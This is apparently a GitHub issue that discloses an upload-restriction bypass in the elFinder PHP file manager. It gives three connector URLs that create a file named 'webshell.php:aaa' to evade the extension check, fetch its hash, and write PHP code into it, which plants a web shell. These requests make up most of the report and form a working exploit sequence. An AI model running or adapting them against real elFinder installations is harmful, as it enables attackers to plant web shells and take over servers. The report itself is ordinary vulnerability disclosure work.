-
Notifications
You must be signed in to change notification settings - Fork 1.4k
Closed
Description
Describe the bug
bypass ext check
Steps to reproduce the behavior:
- create a .php file using the following URL:
http://127.0.0.1/elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa
2.Hash file :
http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=open&target=l1_
3.Add PHP code in webshell.php
http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=put&content=jpeg<?php echo $_GET["infosec_90"]&target=HashFile
p (please complete the following information):**
- OS: Windows XAMPP
Metadata
Metadata
Assignees
Labels
No labels